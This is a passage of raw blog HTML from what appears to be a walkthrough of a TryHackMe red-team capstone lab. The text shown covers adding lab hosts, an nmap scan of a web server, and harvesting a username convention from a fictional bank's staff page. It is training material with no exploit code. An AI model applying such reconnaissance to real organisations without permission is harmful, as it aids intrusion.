data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206141907\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?fit=1024%2C297&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=1024%2C297&#038;ssl=1\" alt=\"\" class=\"wp-image-493\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=1024%2C297&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=300%2C87&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=768%2C223&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?resize=1536%2C446&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206141907.png?w=1933&amp;ssl=1 1933w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>If you don\u2019t want to set up an email client, you can make use of the Roundcube Webmail app at http:\/\/mail.thereserve.loc\/index.php and use the credentials provided during registration to log in.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Once the registration part is done, we can see the hosts and their IP addresses show up on the network diagram.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910155c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910155c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"439\" data-attachment-id=\"452\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206090448\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?fit=1819%2C779&amp;ssl=1\" data-orig-size=\"1819,779\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206090448\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?fit=1024%2C439&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=1024%2C439&#038;ssl=1\" alt=\"\" class=\"wp-image-452\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=1024%2C439&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=300%2C128&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=768%2C329&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?resize=1536%2C658&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090448.png?w=1819&amp;ssl=1 1819w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s add these hosts to our <code>\/etc\/hosts<\/code> file.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"10.200.113.250 ecitizen.thm\n10.200.113.13 web.thereserve.loc\n10.200.113.12 vpn.thereserve.loc\n10.200.113.11 mail.thereserve.loc\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.250<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ecitizen.thm<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">web.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.11<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"8-exploiting-the-external-network-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Exploiting the External Network<\/mark><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"9-osint-on-web-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">OSINT on WEB Machine<\/mark><\/h3>\n\n\n\n<p>We will start by running an NMAP scan on the machine to find open ports and services running.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"10-nmap-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 fe:ee:07:c6:b9:a4:90:5f:ca:71:c8:b6:7b:71:f7:ac (RSA)\n|   256 ca:9d:c8:e4:62:24:56:b2:f6:52:de:de:57:63:ab:fe (ECDSA)\n|_  256 7d:21:b1:c5:04:65:2a:ba:18:20:3c:d2:1d:e4:16:32 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.6<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.7<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">fe:ee:07:c6:b9:a4:90:5f:ca:71:c8:b6:7b:71:f7:ac<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ca:9d:c8:e4:62:24:56:b2:f6:52:de:de:57:63:ab:fe<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7<\/span><span style=\"color: #C3E88D\">d:21:b1:c5:04:65:2a:ba:18:20:3c:d2:1d:e4:16:32<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Apache<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.4<\/span><span style=\"color: #C3E88D\">.29<\/span><span style=\"color: #BABED8\"> ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Site<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">doesn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">t have a title (text\/html).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|_http-server-header: Apache\/2.4.29 (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We have only two ports open:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 for SSH<\/li>\n\n\n\n<li>80 for HTTP<\/li>\n<\/ul>\n\n\n\n<p>Since we do not have credentials to connect via SSH, we can move on to enumerating the web server on port 80.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"11-http-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">HTTP<\/mark><\/h4>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091025fd&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091025fd\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"533\" data-attachment-id=\"453\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206090632\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?fit=1909%2C993&amp;ssl=1\" data-orig-size=\"1909,993\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206090632\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?fit=1024%2C533&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=1024%2C533&#038;ssl=1\" alt=\"\" class=\"wp-image-453\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=1024%2C533&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=300%2C156&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=768%2C399&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=1536%2C799&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?w=1909&amp;ssl=1 1909w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The landing page is the homepage for the TheReserv Bank of Trimento. Going to <code>Meet The Team<\/code> tab, we see some of the users are listed here.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09102c51&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09102c51\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"727\" data-attachment-id=\"454\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206090754\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?fit=1783%2C1265&amp;ssl=1\" data-orig-size=\"1783,1265\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206090754\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?fit=1024%2C727&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=1024%2C727&#038;ssl=1\" alt=\"\" class=\"wp-image-454\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=1024%2C727&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=300%2C213&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=768%2C545&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=1536%2C1090&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?w=1783&amp;ssl=1 1783w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>By opening the picture in a new tab, we see the naming convention of the (potential) domain users.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910323e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910323e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1008\" height=\"1024\" data-attachment-id=\"455\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/image-22-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?fit=1189%2C1208&amp;ssl=1\" data-orig-size=\"1189,1208\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-22\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?fit=1008%2C1024&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=1008%2C1024&#038;ssl=1\" alt=\"\" class=\"wp-image-455\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=1008%2C1024&amp;ssl=1 1008w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=295%2C300&amp;ssl=1 295w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=768%2C780&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?w=1189&amp;ssl=1 1189w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 